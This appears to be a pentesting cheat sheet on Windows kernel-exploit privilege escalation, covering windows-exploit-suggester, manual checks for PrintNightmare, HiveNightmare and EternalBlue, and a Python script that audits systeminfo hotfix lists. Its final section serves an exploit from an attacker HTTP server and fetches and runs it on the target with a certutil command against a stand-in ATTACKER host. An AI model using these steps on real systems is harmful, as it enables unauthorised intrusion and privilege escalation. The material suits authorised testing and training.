KERNEL EXPLOITS

windows-exploit-suggester

Match OS/patches to exploits — collect systeminfo on the target, run wes.py on the attacker machine

systeminfo > sysinfo.txt
python3 wes.py sysinfo.txt
Example Output
python3 wes.py sysinfo.txt
[E] MS17-010: EternalBlue
    Affected: Windows Server 2016
    KB: KB4013389 (NOT installed)
[E] CVE-2021-1732: Win32k Elevation
    Affected: Windows 10/Server 2019
[M] CVE-2020-0787: BITS Elevation
    Affected: All Windows versions
(Cross-reference with installed hotfixes)
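The cross-referencing step described above, as an added Python example that is not part of this page or of windows-exploit-suggester: it parses `systeminfo` output, pulls the OS name and the installed hotfix list, and reports for each advisory whether the closing KB is listed, not listed, or not applicable to that OS. The two sample `systeminfo` texts and the hotfix numbers KB1111111/KB2222222 are constructed; KB4013389 is the value shown above for MS17-010; the second advisory entry is a labelled placeholder that only shows the table shape.

```python
import re
from typing import Dict, List, Tuple

# Advisory -> KB that closes it and OS name substrings it applies to.
# KB4013389 is the KB shown on this page for MS17-010. The ("Windows",)
# scope is a simplification meaning "any Windows build in the list".
# The second entry is a PLACEHOLDER (not a real CVE/KB) used only to
# exercise the not-applicable branch.
ADVISORIES = {
    "MS17-010 (EternalBlue)": {"kb": "KB4013389", "affects": ("Windows",)},
    "CVE-XXXX-XXXX (placeholder)": {"kb": "KB0000000",
                                    "affects": ("Windows Server 2019",)},
}

# Constructed systeminfo output (not from a real host); only the fields the
# parser needs are present. This host does not list KB4013389.
SAMPLE_UNPATCHED = """\
Host Name:                 WS2016-TEST
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB1111111
                           [02]: KB2222222
"""

# Same constructed host, but with the MS17-010 KB in the hotfix list.
SAMPLE_PATCHED = SAMPLE_UNPATCHED.replace(
    "2 Hotfix(s) Installed.", "3 Hotfix(s) Installed.") + \
    "                           [03]: KB4013389\n"

KB_RE = re.compile(r"\[\d+\]:\s*(KB\d+)", re.IGNORECASE)
FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z ()/]*?):\s+(.*)$")


def parse_systeminfo(text: str) -> Dict[str, object]:
    """Extract OS name, architecture string and the set of listed KBs."""
    fields: Dict[str, str] = {}
    hotfixes = set()
    for line in text.splitlines():
        kb = KB_RE.search(line)
        if kb:                      # indented "[NN]: KBxxxxxxx" hotfix rows
            hotfixes.add(kb.group(1).upper())
            continue
        field = FIELD_RE.match(line)
        if field:                   # "Key:   value" rows
            fields[field.group(1).strip()] = field.group(2).strip()
    return {
        "os_name": fields.get("OS Name", ""),
        "system_type": fields.get("System Type", ""),
        "hotfixes": hotfixes,
    }


def audit(info: Dict[str, object], advisories=ADVISORIES) -> List[Tuple[str, str]]:
    """For each advisory: PATCHED (KB listed), MISSING (KB not listed on an
    affected OS) or NOT_APPLICABLE (OS not in the advisory's scope)."""
    results = []
    for name, adv in advisories.items():
        if not any(tag in info["os_name"] for tag in adv["affects"]):
            results.append((name, "NOT_APPLICABLE"))
        elif adv["kb"] in info["hotfixes"]:
            results.append((name, "PATCHED"))
        else:
            results.append((name, "MISSING"))
    return results


def report(text: str) -> List[str]:
    """Human-readable audit lines for one systeminfo capture."""
    info = parse_systeminfo(text)
    lines = [f"OS: {info['os_name']} ({info['system_type']}), "
             f"{len(info['hotfixes'])} hotfix(es) listed"]
    lines += [f"[{status}] {name}" for name, status in audit(info)]
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_UNPATCHED)))
    print()
    print("\n".join(report(SAMPLE_PATCHED)))
```

A MISSING result means the specific KB is not listed, not that the host is necessarily exposed: on Windows 10/Server 2016 and later, cumulative updates supersede older KBs, so the original number often disappears from the hotfix list on a fully patched host. Confirm MISSING findings against the OS build number from the `OS Version` line before treating them as real gaps.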

Check for common CVEs

Quick manual check — Based on OS version

PrintNightmare (CVE-2021-34527)
HiveNightmare (CVE-2021-36934)
EternalBlue (MS17-010)
MS16-032 (Secondary Logon)
Example Output
PrintNightmare (CVE-2021-1675 / CVE-2021-34527):
Get-Service Spooler -> Running = potentially vulnerable

HiveNightmare (CVE-2021-36934):
icacls C:\Windows\System32\config\SAM -> BUILTIN\Users:(I)(RX) = vulnerable!

EternalBlue (MS17-010):
nmap --script smb-vuln-ms17-010 -p 445 target
(Check each based on OS version)

Compile and transfer exploit

Match architecture — x86 vs x64 matters

Cross-compile or use pre-compiled binaries from GitHub
Example Output
On attacker:
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe
python3 -m http.server 80

On target:
certutil -urlcache -split -f http://ATTACKER/exploit.exe C:\temp\exploit.exe
C:\temp\exploit.exe
(Cross-compile Windows exploits on Linux)